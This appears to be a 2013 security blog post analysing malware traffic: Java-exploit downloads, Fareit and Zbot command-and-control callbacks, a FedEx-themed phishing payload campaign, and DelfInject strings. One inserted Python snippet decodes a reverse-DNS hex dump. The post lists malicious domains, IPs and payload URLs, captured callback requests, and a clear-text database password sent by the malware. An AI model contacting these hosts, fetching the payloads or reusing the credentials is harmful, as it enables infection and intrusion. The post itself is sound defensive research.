User-Agent: Mozilla/4.0 (Windows XP 5.1) Java/1.6.0_29
Host: jindalo.ru:8080
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive</span></pre>
<pre class="dualColTextStyle" hasbox="2"></pre>
<pre class="dualColTextStyle" hasbox="2"></pre>
<pre class="dualColTextStyle" hasbox="2"><table style="background-color: white; border-collapse: collapse; border-spacing: 0px; color: #333333; font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 8px; margin-left: 8px; max-width: 100%;"><tbody>
<tr><td style="padding: 8px 10px 9px;">SHA256:</td><td style="padding: 8px 10px 9px;">5f22da4c9ace64d97bc5d3107eaaca8cf1b88da61bd173996f839e88222f4257</td></tr>
<tr><td style="padding: 8px 10px 9px;">File name:</td><td style="padding: 8px 10px 9px;">blackhole.exe</td></tr>
<tr><td style="padding: 8px 10px 9px;">Detection ratio:</td><td class="
text-red " style="color: rgb(180, 12, 26) !important; padding: 8px 10px 9px;">1 / 46</td></tr>
<tr><td style="padding: 8px 10px 9px;">Analysis date:</td><td style="padding: 8px 10px 9px;">2013-04-21 21:37:27 UTC ( 0 minutes ago )</td></tr>
</tbody></table>
</pre>
<pre class="dualColTextStyle" hasbox="2"><a href="https://www.virustotal.com/en/file/5f22da4c9ace64d97bc5d3107eaaca8cf1b88da61bd173996f839e88222f4257/analysis/1366580247/">https://www.virustotal.com/en/file/5f22da4c9ace64d97bc5d3107eaaca8cf1b88da61bd173996f839e88222f4257/analysis/1366580247/</a></pre>
<pre class="dualColTextStyle" hasbox="2"></pre>
<pre class="dualColTextStyle" hasbox="2">Ok, nothing new here. Whatever. Thanks for exploiting my Java. Strings is all garbage, PEiD balked.</pre>
<pre class="dualColTextStyle" hasbox="2"></pre>
<pre class="dualColTextStyle" hasbox="2">1,400+ UDP 16471 ala ZeroAccess in like 20 minutes and an interesting one on 55755.</pre>
<pre class="dualColTextStyle" hasbox="2"></pre>
<pre class="dualColTextStyle" hasbox="2"></pre>
<pre class="dualColTextStyle" hasbox="2"><span style="color: red;"> GET /app/geoip.js HTTP/1.0
Host: j.maxmind.com
Connection: close</span>
</pre>
<pre class="dualColTextStyle" hasbox="2">Ok, nothing new here. I'm located in Boca Raton playing golf with Tiger Woods, how did you guess?</pre>
<pre class="dualColTextStyle" hasbox="2"></pre>
<pre class="dualColTextStyle" hasbox="2">__________________________________________</pre>
<pre class="dualColTextStyle" hasbox="2"></pre>
<pre class="dualColTextStyle" hasbox="2"><span style="color: red;">POST /10qVeAAAA/ebH7oAAAAA/rDhlJAA/ HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
Host: 88.191.130.98:8080
Content-Length: 339
Connection: Keep-Alive
Cache-Control: no-cache</span>
</pre>
<pre class="dualColTextStyle" hasbox="2"></pre>
<pre class="dualColTextStyle" hasbox="2">IP Seen on URL Query: <a href="http://urlquery.net/report.php?id=1768644">http://urlquery.net/report.php?id=1768644</a></pre>
<pre class="dualColTextStyle" hasbox="2"></pre>
<pre class="dualColTextStyle" hasbox="2">__________________________________________</pre>
<pre class="dualColTextStyle" hasbox="2"></pre>
<pre class="dualColTextStyle" hasbox="2"><span style="color: red;">POST /asp/intro.php HTTP/1.0
Host: 111.68.142.223
Accept: */*
Accept-Encoding: identity, *;q=0
Content-Length: 269
Connection: close
Content-Type: application/octet-stream
Content-Encoding: binary
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)</span></pre>
<pre class="dualColTextStyle" hasbox="2"></pre>
<pre class="dualColTextStyle" hasbox="2">User agent is a big indicator here. Somewhat interesting, documented by #MalwareMustDie <a href="http://malwaremustdie.blogspot.com/2012/12/the-crime-still-goes-on-trojan-parfeit.html">http://malwaremustdie.blogspot.com/2012/12/the-crime-still-goes-on-trojan-parfeit.html</a></pre>
<pre class="dualColTextStyle" hasbox="2"></pre>
<pre class="dualColTextStyle" hasbox="2">Consistent with Trojan Fareit callbacks <Hat Tip MalwareMustDie>, but no botid url following this.</pre>
<pre class="dualColTextStyle" hasbox="2">__________________________________________</pre>
<pre class="dualColTextStyle" hasbox="2"></pre>
<pre class="dualColTextStyle" hasbox="2">This one looks interesting. <b>Using Bit.ly</b>, but a 301 to Google put the kibosh on this one. </pre>
<pre class="dualColTextStyle" hasbox="2"></pre>
<pre class="dualColTextStyle" hasbox="2"><span style="color: red;"><b>POST /YddCcn? HTTP/1.1</b>
Content-Type: application/x-www-form-urlencoded
Content-Length: 121
Accept: */*
<b>User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)</b><span id="goog_291860309"></span><span id="goog_291860310"></span><a href="http://www.blogger.com/"></a>
<b>Host: bit.ly</b>
Connection: Keep-Alive
<b>op=IncluirAvisos&HostBD=dbmy0060%2Ewhservidor%2Ecom&SenhaBD=delphi2020&UsuarioBD=
turckatty_2&DatabaseBD=turckatty_2&sgdb=</b></span></pre>
<pre class="dualColTextStyle" hasbox="2"></pre>
<pre class="dualColTextStyle" hasbox="2">Well the user agent is known badness: <a href="http://www.secureworks.com/cyber-threat-intelligence/threats/visal-b/">here</a> and <a href="https://dylansserver.com/note/malware_analysis">here</a> dating back to 2010.</pre>
<pre class="dualColTextStyle" hasbox="2"></pre>
<pre class="dualColTextStyle" hasbox="2"></pre>
<pre class="dualColTextStyle" hasbox="2"><span style="color: red;"> GET /WggQJ3RVGrKgdj0xLjImaWQ9NDIzODYxMDcxNiZhaWQ9MzA1NjImc2lkPTAmb3M9NS4xLTMyGuzZ
0s7u HTTP/1.0
Host: xlotxdxtorwfmvuzfuvtspel.com
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0)
Accept-Language: en-us
Connection: close</span></pre>
<pre class="dualColTextStyle" hasbox="2"></pre>
<pre class="dualColTextStyle" hasbox="2"><strike>I surmise this is a check in because I get a 200 OK but the content is empty - just a speculation. </strike> Site Sinkholed.</pre>
<pre class="dualColTextStyle" hasbox="2">
</pre>
<pre class="dualColTextStyle" hasbox="2"></pre>
<pre class="dualColTextStyle" hasbox="2">Ok, now for some FTP. The malware calls out to an FTP server with the user name and password in clear text (most appreciated).</pre>
<pre class="dualColTextStyle" hasbox="2"><span style="color: red;">
</span></pre>
<pre class="dualColTextStyle" hasbox="2"><table cellpadding="0" cellspacing="0" class="outerTableDual" hasbox="2"><tbody class="outerTableTbody" hasbox="2">
<tr hasbox="2">
<td class="outerTableTbodyTdResponse" hasbox="2"><div class="NETWITNESS_CSS_responseOneColumn" hasbox="2">
<table cellpadding="0" cellspacing="0" hasbox="2" style="width: 100%;">
<tbody hasbox="2">
<tr hasbox="2"><td class="NETWITNESS_CSS_response" hasbox="2" valign="top"><pre class="dualColTextStyle"><span style="color: red;">220 Microsoft FTP Service
USER <redacted>
331 Password required for <redacted>.
PASS <redacted>
230 User logged in.
215 Windows_NT
CWD /dados/maxo4/
250 CWD command successful.
PASV
227 Entering Passive Mode (<redacted>).
RETR E174D3044694.jpg
550 The system cannot find the file specified.
</span></pre>
<div>
</div>
<div>
This thing tried multiple jpg files, none of which could be found.</div>
</td><td style="width: 10px;"></td><td align="right" class="NETWITNESS_CSS_responseOneColumn"></td></tr>
</tbody></table>
</div>
</td></tr>
<tr hasbox="2"><td class="outerTableTbodyTdResponse" hasbox="2">Well, I'm not going to let that one go by.</td></tr>
<tr hasbox="2"><td hasbox="2"></td></tr>
<tr hasbox="2"><td class="outerTableTbodyTdResponse" hasbox="2"></td></tr>
</tbody></table>
</pre>
<pre class="dualColTextStyle" hasbox="2">Piqued my interest. I go digging and I find a root directory</pre>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvW88KCRMFx1DLyrdCL0YENOlHFez70AZ8o0H-kt5N67WK3bu3D5j6iW6l08MKgGcJp34QfoUd9Igq3KLtyxju98UExxRyBXnk-3cqJLJwO5eCW-LhY-YCmPDGujgMpPv7imT52ybuV8g/s1600/ftp+directory.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvW88KCRMFx1DLyrdCL0YENOlHFez70AZ8o0H-kt5N67WK3bu3D5j6iW6l08MKgGcJp34QfoUd9Igq3KLtyxju98UExxRyBXnk-3cqJLJwO5eCW-LhY-YCmPDGujgMpPv7imT52ybuV8g/s1600/ftp+directory.PNG" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg8rJO0mUmV1PObqjlrmNCItrr3D3ZCPKft7Nrdm8xqiT2vjO65N8xRokZk8GgSyWGp_20aVWqAK4Oz84pdUyivUsEjztq32wk5wt_NZiZ9emRSw3ZwRtB-C4LNQDNC2H6PLUxs58D19aE/s1600/ftp-directories.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg8rJO0mUmV1PObqjlrmNCItrr3D3ZCPKft7Nrdm8xqiT2vjO65N8xRokZk8GgSyWGp_20aVWqAK4Oz84pdUyivUsEjztq32wk5wt_NZiZ9emRSw3ZwRtB-C4LNQDNC2H6PLUxs58D19aE/s1600/ftp-directories.PNG" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPYIQZLyAWynFm110ZlTtuoW0p17K5qWi5zac4TKMBsa9d9j9lgPrRIdhVdQGGiLR25s_2A-QfbD465iEOmLHFQdCeE7O2mFPZ9iENiox75oJzoQqbOODi73Vj6F3MSU5ax1D5xShxeeE/s1600/ftp+jpg.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPYIQZLyAWynFm110ZlTtuoW0p17K5qWi5zac4TKMBsa9d9j9lgPrRIdhVdQGGiLR25s_2A-QfbD465iEOmLHFQdCeE7O2mFPZ9iENiox75oJzoQqbOODi73Vj6F3MSU5ax1D5xShxeeE/s1600/ftp+jpg.PNG" /></a></div>
<pre class="dualColTextStyle" hasbox="2">Interesting, so I download the jpgs that are there. </pre>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGSZQMMD45MIPoonwvdhQhyyCt0loxoKEQbOpb3E7a5Q4CQLum5MxLaESy_vDexcdAZhbAqwEq8MXWmJAfTadUtN0kb_CyjsmX2JzjU_AED9GbBR1knMaWlGaYGpkuKo96v30vdq5w7ag/s1600/virus.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGSZQMMD45MIPoonwvdhQhyyCt0loxoKEQbOpb3E7a5Q4CQLum5MxLaESy_vDexcdAZhbAqwEq8MXWmJAfTadUtN0kb_CyjsmX2JzjU_AED9GbBR1knMaWlGaYGpkuKo96v30vdq5w7ag/s1600/virus.PNG" /></a></div>
<pre class="dualColTextStyle" hasbox="2">The worm is a variant of DelfInject.</pre>
<pre class="dualColTextStyle" hasbox="2"></pre>
<pre class="dualColTextStyle" hasbox="2"><b>MZP ÿÿ¸@ º ´ Í!¸ LÍ!This program must be run under Win32 $</b></pre>
<pre class="dualColTextStyle" hasbox="2">Dumping the strings:</pre>
<pre class="dualColTextStyle" hasbox="2"></pre>
<pre class="dualColTextStyle" hasbox="2">DVCLAL
PACKAGEINFO
PORCOS
TDTCONFIG
TFORM1
TFRMDATETIME
xn7
CPlApplet
kernel32.dll
LoadLibraryA
GetProcAddress
VirtualAlloc
VirtualFree
oleaut32.dll
SysFreeString
advapi32.dll
RegQueryValueExW
user32.dll
LoadStringW
msimg32.dll
AlphaBlend
gdi32.dll
UnrealizeObject
version.dll
VerQueryValueW
ole32.dll
OleUninitialize
comctl32.dll
InitializeFlatSB
<b>winspool.drv</b>
<b>OpenPrinterW</b>
ntdll
NtUnmapViewOfSection</pre>
<pre class="dualColTextStyle" hasbox="2"></pre>
<pre class="dualColTextStyle" hasbox="2">Interesting DNS Traffic to a Sprint Wireless Address, no further traffic on this one. Pwned mobile? (Guessing)</pre>
<pre class="dualColTextStyle" hasbox="2"></pre>
<pre class="dualColTextStyle" hasbox="2">00000085 : <span class="hexPacketPayload" hasbox="2">00 00 00 01 00 00 03 31 37 33 01 34 03 32 35 30</span> [<span class="hexPacketPayload" hasbox="2">.......173.4.250</span>]
00000095 : <span class="hexPacketPayload" hasbox="2">02 31 30 07 69 6E 2D 61 64 64 72 04 61 72 70 61</span> [<span class="hexPacketPayload" hasbox="2">.10.in-addr.arpa</span>]
</pre>
<pre class="dualColTextStyle" hasbox="2"></pre>
<pre class="dualColTextStyle" hasbox="2">173.4.250.10</pre>
<pre class="dualColTextStyle" hasbox="2">88.191.130.98:8080</pre>
<pre class="dualColTextStyle" hasbox="2"><span style="color: red;">jindalo.ru:8080</span></pre>
<pre class="dualColTextStyle" hasbox="2"><span style="color: red;">111.68.142.223</span></pre>
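Added example (not part of the original post): a decoder for the length-prefixed DNS name in the hex dump above. Names under in-addr.arpa carry the IPv4 octets in reverse order, so the decoder reverses them to recover the address that was actually looked up. The name offset of 6 within the fragment is an assumption, because the dump starts mid-message and ends before the terminating root label.

```python
"""Decode the reverse-DNS (PTR) name from the hex dump shown in the post."""
import ipaddress

# Bytes copied from the two hex-dump lines in the post (capture offsets 0x85-0xA4).
FRAGMENT = bytes.fromhex(
    "00 00 00 01 00 00 03 31 37 33 01 34 03 32 35 30 "
    "02 31 30 07 69 6E 2D 61 64 64 72 04 61 72 70 61"
)

# Assumption: the first six bytes are the tail of the 12-byte DNS header,
# so the first label length byte sits at fragment offset 6.
NAME_OFFSET = 6


def read_labels(buf, offset):
    """Read length-prefixed DNS labels (RFC 1035, section 3.1).

    Returns (labels, terminated). terminated is False when the buffer ends
    before the zero-length root label, as it does in this truncated dump.
    """
    labels = []
    while offset < len(buf):
        length = buf[offset]
        if length == 0:
            return labels, True
        if length & 0xC0:
            # Top bits set means a compression pointer (or reserved value).
            # It cannot be followed without the start of the message.
            raise ValueError(f"pointer or reserved bits at offset {offset}")
        offset += 1
        if offset + length > len(buf):
            raise ValueError("label runs past end of buffer")
        labels.append(buf[offset:offset + length].decode("ascii"))
        offset += length
    return labels, False


def ptr_labels_to_ip(labels):
    """Turn ['d', 'c', 'b', 'a', 'in-addr', 'arpa'] into IPv4Address('a.b.c.d')."""
    lowered = [label.lower() for label in labels]
    if len(lowered) != 6 or lowered[4:] != ["in-addr", "arpa"]:
        raise ValueError("not a full IPv4 in-addr.arpa name")
    octets = lowered[:4]
    if not all(o.isdigit() and int(o) <= 255 for o in octets):
        raise ValueError("non-numeric or out-of-range octet")
    # The name lists the least significant octet first; reverse to get the IP.
    return ipaddress.IPv4Address(".".join(reversed(octets)))


def analyse(buf=FRAGMENT, offset=NAME_OFFSET):
    """Decode the name and report which address the PTR lookup refers to."""
    labels, terminated = read_labels(buf, offset)
    ip = ptr_labels_to_ip(labels)
    qname = ".".join(labels)
    return {
        "qname": qname,
        "terminated": terminated,
        "queried_ip": ip,
        "is_private": ip.is_private,
        # Cross-check: the stdlib builds the same name from the decoded IP.
        "round_trip_ok": ip.reverse_pointer == qname.lower(),
    }


if __name__ == "__main__":
    for key, value in analyse().items():
        print(f"{key}: {value}")
```

The decoded address falls in 10.0.0.0/8, which is RFC 1918 private space, so a reverse lookup like this usually concerns a host on the local network rather than a routable destination.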
<pre class="dualColTextStyle" hasbox="2">Additional References:</pre>
<pre class="dualColTextStyle" hasbox="2"><a href="http://labs.snort.org/iplists/urllist-2012-07-01">http://labs.snort.org/iplists/urllist-2012-07-01</a></pre>
<pre class="dualColTextStyle" hasbox="2"><a href="http://www.soleranetworks.com/blogs/tag/mozilla4-0-compatible-win32-winhttp-winhttprequest-5/">http://www.soleranetworks.com/blogs/tag/mozilla4-0-compatible-win32-winhttp-winhttprequest-5/</a></pre>
<pre class="dualColTextStyle" hasbox="2"><a href="http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=VirTool%3AWin32%2FDelfInject.gen!BI">http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=VirTool%3AWin32%2FDelfInject.gen!BI</a></pre>
<pre class="dualColTextStyle" hasbox="2"></pre>
<b><span style="font-size: large;">Fake FedEx Phishing Zbot</span></b> (published 2013-03-26, updated 2013-03-31)<br />
<span style="font-size: large;"><b>URL Query Examples:</b></span><br />
http://urlquery.net/search.php?q=fedex_trk&type=string&start=2013-03-11&end=2013-03-26&max=50<br />
<br />
<table class="test "><thead>
<tr class="header"><th>Date (CET)</th><th>Alerts / IDS</th><th>URL</th><th>IP</th></tr>
</thead><tbody>
<tr class="odd_highlight"><td>2013-03-26 16:38:29</td><td align="center"><b>0 / 0</b></td><td><a href="http://urlquery.net/report.php?id=1618524">http://jimperona.com/plugins/fedex_trk_61293150511865307217.zip</a></td><td>208.109.227.206 (United States)</td></tr>
<tr class="even_highlight"><td>2013-03-26 10:18:09</td><td align="center"><b>0 / 1</b></td><td><a href="http://urlquery.net/report.php?id=1615834">http://ilconline.org/images/fedex_trk_61293150511865307217.zip</a></td><td>208.109.138.8 (United States)</td></tr>
<tr class="odd_highlight"><td>2013-03-25 17:26:17</td><td align="center"><b>0 / 1</b></td><td><a href="http://urlquery.net/report.php?id=1594225">http://ilconline.org/images/fedex_trk_61293150511865307217.zip</a></td><td>208.109.138.8 (United States)</td></tr>
<tr class="even_highlight"><td>2013-03-25 15:32:11</td><td align="center"><b>0 / 1</b></td><td><a href="http://urlquery.net/report.php?id=1592151">http://jimperona.com/plugins/fedex_trk_61293150511865307217.zip</a></td><td>72.167.183.50 (United States)</td></tr>
<tr class="odd_highlight"><td>2013-03-25 15:26:38</td><td align="center"><b>0 / 1</b></td><td><a href="http://urlquery.net/report.php?id=1592062">http://jimperona.com/plugins/fedex_trk_61293150511865307217.zip</a></td><td>72.167.183.50 (United States)</td></tr>
<tr class="even_highlight"><td>2013-03-25 15:21:55</td><td align="center"><b>0 / 1</b></td><td><a href="http://urlquery.net/report.php?id=1591994">http://jimperona.com/plugins/fedex_trk_61293150511865307217.zip</a></td><td>72.167.183.50 (United States)</td></tr>
<tr class="odd_highlight"><td>2013-03-25 15:18:27</td><td align="center"><b>0 / 1</b></td><td><a href="http://urlquery.net/report.php?id=1591941">http://jimperona.com/plugins/fedex_trk_61293150511865307217.zip</a></td><td>72.167.183.50 (United States)</td></tr>
<tr class="even_highlight"><td>2013-03-25 15:12:23</td><td align="center"><b>0 / 0</b></td><td><a href="http://urlquery.net/report.php?id=1591841">http://jimperona.com/plugins/fedex_trk_61293150511865307217.zip</a></td><td>72.167.183.50 (United States)</td></tr>
<tr class="odd_highlight"><td>2013-03-25 15:10:29</td><td align="center"><b>0 / 1</b></td><td><a href="http://urlquery.net/report.php?id=1591804">http://jimperona.com/plugins/fedex_trk_61293150511865307217.zip</a></td><td>72.167.183.50 (United States)</td></tr>
<tr class="even_highlight"><td>2013-03-25 15:01:10</td><td align="center"><b>0 / 0</b></td><td><a href="http://urlquery.net/report.php?id=1591641">http://jimperona.com/plugins/fedex_trk_61293150511865307217.zip</a></td><td>72.167.183.50 (United States)</td></tr>
<tr class="odd_highlight"><td>2013-03-25 14:59:39</td><td align="center"><b>0 / 1</b></td><td><a href="http://urlquery.net/report.php?id=1591617">http://jimperona.com/plugins/fedex_trk_61293150511865307217.zip</a></td><td>72.167.183.50 (United States)</td></tr>
<tr class="even_highlight"><td>2013-03-25 14:47:02</td><td align="center"><b>0 / 1</b></td><td><a href="http://urlquery.net/report.php?id=1591418">http://jimperona.com/plugins/fedex_trk_61293150511865307217.zip</a></td><td>72.167.183.50 (United States)</td></tr>
</tbody></table>
<br />
<i>Go get it</i><br />
<br />
<b><span style="font-size: large;">Offending Host:</span></b><br />
<strike>178.175.139.47 </strike>Taken down<br />
<strike>213.57.77.220 </strike>Taken down<br />
hotels2013.org<br />
adverts2013.org<br />
yamaha-motor2013.com<br />
<br />
UPDATE: Callback:<br />
<table class="test " style="background-color: white; border-bottom-left-radius: 4px; border-bottom-right-radius: 4px; border-collapse: collapse; border-spacing: 0px; border-top-left-radius: 4px; border-top-right-radius: 4px; border: 1px solid rgb(0, 0, 0); color: #222222; font-family: 'Segoe UI', Segoe, 'Helvetica Neue', Helvetica, Roboto, Arial, FreeSans, sans-serif; font-size: 12px; line-height: 12px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline; width: 967px;"><thead style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">
<tr class="header" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"><th style="background-color: #2d3c4e; border: 0px; color: white; margin: 0px; outline: 0px; padding: 5px; vertical-align: baseline;" width="90px">Date (CET)</th><th style="background-color: #2d3c4e; border: 0px; color: white; margin: 0px; outline: 0px; padding: 5px; vertical-align: baseline;" width="80px">Alerts / IDS</th><th style="background-color: #2d3c4e; border: 0px; color: white; margin: 0px; outline: 0px; padding: 5px; vertical-align: baseline;">URL</th><th style="background-color: #2d3c4e; border: 0px; color: white; margin: 0px; outline: 0px; padding: 5px; vertical-align: baseline;" width="110px">IP</th></tr>
</thead><tbody style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">
<tr class="odd_highlight" style="background-color: #ced6df; border: 1px solid rgb(89, 109, 136); margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"><td style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 3px; vertical-align: baseline;"><nobr></nobr><br />
<center>
<nobr>
2013-03-31 11:57:12</nobr></center>
<nobr>
</nobr></td><td align="center" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 3px; vertical-align: baseline;"><b style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">0 / 1</b></td><td style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 3px; vertical-align: baseline;"><a href="http://urlquery.net/report.php?id=1702609" style="background-color: transparent; color: black; cursor: pointer; margin: 0px; padding: 0px; text-decoration: none; vertical-align: baseline;" title="http://adverts2013.com/pmserver/get.php">http://adverts2013.com/pmserver/get.php</a></td><td style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 3px; text-align: center; vertical-align: baseline;"><img align="left" height="11" src="http://urlquery.net/images/flags/il.png" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: middle;" title="Israel" width="16" />213.57.77.220</td></tr>
<tr class="even_highlight" style="background-color: #d9dfe6; border: 1px solid rgb(89, 109, 136); margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"><td style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 3px; vertical-align: baseline;"><nobr></nobr><br />
<center>
<nobr>
2013-03-30 19:26:22</nobr></center>
<nobr>
</nobr></td><td align="center" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 3px; vertical-align: baseline;"><b style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">0 / 1</b></td><td style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 3px; vertical-align: baseline;"><a href="http://urlquery.net/report.php?id=1692254" style="background-color: transparent; color: black; cursor: pointer; margin: 0px; padding: 0px; text-decoration: none; vertical-align: baseline;" title="http://geographic-channel.com/pmserver/browse.php">http://geographic-channel.com/pmserver/browse.php</a></td><td style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 3px; text-align: center; vertical-align: baseline;"><img align="left" height="11" src="http://urlquery.net/images/flags/il.png" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: middle;" title="Israel" width="16" />213.57.77.220</td></tr>
<tr class="odd_highlight" style="background-color: #ced6df; border: 1px solid rgb(89, 109, 136); margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"><td style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 3px; vertical-align: baseline;"><nobr></nobr><br />
<center>
<nobr>
2013-03-30 19:26:09</nobr></center>
<nobr>
</nobr></td><td align="center" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 3px; vertical-align: baseline;"><b style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">0 / 1</b></td><td style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 3px; vertical-align: baseline;"><a href="http://urlquery.net/report.php?id=1692249" style="background-color: transparent; color: black; cursor: pointer; margin: 0px; padding: 0px; text-decoration: none; vertical-align: baseline;" title="http://geographic-channel.com/pmserver/browse.php">http://geographic-channel.com/pmserver/browse.php</a></td><td style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 3px; text-align: center; vertical-align: baseline;"><img align="left" height="11" src="http://urlquery.net/images/flags/il.png" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: middle;" title="Israel" width="16" />213.57.77.220</td></tr>
<tr class="even_highlight" style="background-color: #d9dfe6; border: 1px solid rgb(89, 109, 136); margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"><td style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 3px; vertical-align: baseline;"><nobr></nobr><br />
<center>
<nobr>
2013-03-30 19:22:41</nobr></center>
<nobr>
</nobr></td><td align="center" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 3px; vertical-align: baseline;"><b style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">0 / 1</b></td><td style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 3px; vertical-align: baseline;"><a href="http://urlquery.net/report.php?id=1692162" style="background-color: transparent; color: black; cursor: pointer; margin: 0px; padding: 0px; text-decoration: none; vertical-align: baseline;" title="http://hotels2013.org/pmserver/browse.php">http://hotels2013.org/pmserver/browse.php</a></td><td style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 3px; text-align: center; vertical-align: baseline;"><img align="left" height="11" src="http://urlquery.net/images/flags/il.png" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: middle;" title="Israel" width="16" />213.57.77.220</td></tr>
</tbody></table>
<br />
<br />
<pre><span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;">PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 5.5p1 Debian 6+squeeze3 (protocol 2.0)
80/tcp open  http    nginx 1.2.7</span></pre>
<br />
<span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;"><br /></span>
<br />
<pre><span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;">inetnum: 178.175.139.32 - 178.175.139.63
netname: VPSCORNER-NET
descr: VPSCorner
country: MD
admin-c: CC11822-RIPE
tech-c: CC11822-RIPE
status: ASSIGNED PA
mnt-by: TRABIA-MNT
changed: noc@trabia.net 20130318
source: RIPE</span></pre>
<br />
<span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;"><br /></span>
<i><span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;">Submitted.</span></i><br />
<br />
<b><span style="font-size: large;">Web Traffic:</span></b><br />
<br />
POST /pmserver/browse.php HTTP/1.1<br />
Accept: */*<br />
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)<br />
Host: hotels2013.org<br />
Content-Length: 119<br />
Connection: Keep-Alive<br />
Cache-Control: no-cache<br />
<br />
<br />
HTTP/1.1 200 OK<br />
Server: nginx/1.2.7<br />
Date: Tue, 26 Mar 2013 13:29:45 GMT<br />
Content-Type: application/octet-stream<br />
Content-Length: 26704<br />
Connection: keep-alive<br />
X-Powered-By: PHP/5.3.23-1~dotdeb.0<br />
Cache-Control: public<br />
Content-Disposition: attachment; filename="%2e/files/ftc.jpg"<br />
Content-Transfer-Encoding: binary<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjL9zrP4BT2YoBe8fhxIzySX0POPmpSdxYS_xwiven0LFZDs2XRSeTsaTsXtetRY5-cKk6hGVE4r8DHmrvO06fF9lvRIK6NaI8DAS-Y7iIz1W0QaXivF4LcJSxt7oDKw6MaQIlhJLYjqAs/s1600/pmserver.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="94" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjL9zrP4BT2YoBe8fhxIzySX0POPmpSdxYS_xwiven0LFZDs2XRSeTsaTsXtetRY5-cKk6hGVE4r8DHmrvO06fF9lvRIK6NaI8DAS-Y7iIz1W0QaXivF4LcJSxt7oDKw6MaQIlhJLYjqAs/s640/pmserver.PNG" width="640" /></a></div>
<br />
<br />
<br />
POST /pmserver/get.php HTTP/1.1<br />
Accept: */*<br />
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)<br />
Host: adverts2013.com<br />
Content-Length: 380<br />
Connection: Keep-Alive<br />
Cache-Control: no-cache<br />
<br />
<br />
<br />
HTTP/1.1 200 OK<br />
Server: nginx/1.2.7<br />
Date: Tue, 26 Mar 2013 13:30:16 GMT<br />
Content-Type: text/html<br />
Transfer-Encoding: chunked<br />
